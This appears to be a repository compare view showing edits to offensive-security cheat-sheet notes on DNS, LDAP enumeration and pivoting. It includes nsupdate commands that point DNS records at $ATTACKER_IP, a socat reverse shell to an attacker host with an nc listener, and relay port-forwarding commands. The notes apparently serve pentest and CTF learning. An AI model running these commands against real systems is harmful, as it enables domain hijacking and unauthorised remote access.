whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

Compare commits

base: whx:3f066cb6639a2cb05c0e46e5b6cffc9e716b6d83
Branches Tags
whx:master
..
compare: whx:74e0c3e76a886c164c955ca0d8f79bbbb258d1d3
Branches Tags
whx:master

No commits in common. "3f066cb6639a2cb05c0e46e5b6cffc9e716b6d83" and "74e0c3e76a886c164c955ca0d8f79bbbb258d1d3" have entirely different histories.
3f066cb663 ... 74e0c3e76a

3 changed files with 34 additions and 47 deletions
Show Stats Expand all files Collapse all files

14
Enumeration/DNS.md
View File

@ -8,12 +8,12 @@ dig @$TARGET_DNS $DOMAIN axfr
drill @$TARGET_DNS $DOMAIN axfr
```
There is also [subrake](https://github.com/hash3liZer/Subrake.git) for sudbdomain enumeration.
A Subdomain Enumeration and Validation tool for Bug Bounty and Pentesters.
* [subrake](https://github.com/hash3liZer/Subrake.git)
## Join a Domain
Join a windows domain by setting the A record to the attacker's IP, needs cert and Pk
* Join a windows domain by setting the A record to the attacker's IP, needs cert and Pk
```sh
nsupdate
server <DNS-IP>
@ -22,11 +22,11 @@ update add <sub.domain.com> 1234 A $ATTACKER_IP
send
quit
```
Afterwards, check the domain by querying the subdomain's A record via dig/drill/nslookup.
* Check domain by querying the subdomain's A record via dig/drill/nslookup
### Found Secrets for Keys
Sometimes secrets can be found secret like a key, for example in `/etc/bind/named.conf`. This secret can be used to join the domain.
If there is the possiblity of found secret for a key, for example in `/etc/bind/named.conf` then this secret can be used to join the domain.
```sh
nsupdate -d -y <hash algorithm>:<name of the key>:<secret>
Creating key...
@ -34,10 +34,10 @@ namefromtext
keycreate
server <domain>
update add <subdomain>.<toplevel-domain>. 86400 IN A $ATTACKER_IP
update add mail.snoopy.htb. 86400 IN A $ATTACKER_IP
send
```
*Hint*: Copy the lines, every space counts as it has to be exactly like in the example
Copy the lines, every space counts as it has to be exactly like in the example

5
Enumeration/LDAP.md
View File

@ -2,7 +2,6 @@
## Get Domain
Use the `ldapsearch` tool to receive information from an LDAP server.
```sh
ldapsearch -H ldap://$TARGET_IP -x -s base namingcontexts
```
@ -17,8 +16,8 @@ ldapsearch -H ldap://$TARGET_IP -x -b 'DC=<DC>,DC=<ORG>' -D '<DC>\<user>' -W > o
## Domain Dump
If a set of LDAP credentials is known dump the domain via
* If a set of credentials are known via
```sh
ldapdomaindump $TARGET_IP -u '<domain>\<user>' -p '<password>' --no-json --no-grep
```
The result is a set of HTML files, take a look at them.
* Take a look at the genreated HTML files

62
Post Exploitation/Pivoting.md
View File

@ -92,49 +92,37 @@ echo y | &.\plink.exe -ssh -l <MYUSERNAME> -pw <MYPASSWORD> -R <MYIP>:<MYPORT>:1
### Socat
#### Local PortForwarding via Socat
Open a local port (here 80) on a network interface
```sh
./socat TCP4-LISTEN:8080,fork TCP4:127.0.0.1:80
```
#### Open a reverse shell via Socat
* Reverse shell on target via
```sh
./socat tcp-l:8000 tcp:<attacker-IP>:443 &
```
* Attacking bind shell on attacker
```sh
sudo nc -lvnp 443
```
```sh
./socat tcp-l:8000 tcp:<attacker-IP>:443 &
```
* Attacking bind shell
```sh
sudo nc -lvnp 443
```
#### Jumpserver via Socat
* Relay on jumpserver via
```sh
./socat tcp-l:33060,fork,reuseaddr tcp:<TargetIP>:3306 &
```
* Relay on a jumpserver via
```sh
./socat tcp-l:33060,fork,reuseaddr tcp:<TargetIP>:3306 &
```
* Quiet Port Forwarding
* On attacker
```sh
socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &
```
* On relay server
```sh
./socat tcp:<attacker-IP>:8001 tcp:<TargetIP>:<TargetPort>,fork &
```
* Open `localhost:8000`
#### Quiet Port Forwarding Through a Relay Server via Socat
* On attacker
```sh
socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &
```
* On relay server
```sh
./socat tcp:<attacker-IP>:8001 tcp:<TargetIP>:<TargetPort>,fork &
```
__Notes__: Open `localhost:8000` on the attacker's browser or curl it afterwards. Processes are backgrounded via `&`. Therefore, the process can be quit by using the corresponding bg number like `kill %1`.
#### Forward Local Port via Socat
* Processes are backgrounded via `&`. Therefore, the process can be quit by using the corresponding bg number like `kill %1`.
* In need of a Download on target, expose a port on the attacker via relay
```sh
socat tcp-l:80,fork tcp:$ATTACKER_IP:80
```
```sh
socat tcp-l:80,fork tcp:$ATTACKER_IP:80
```
### Chisel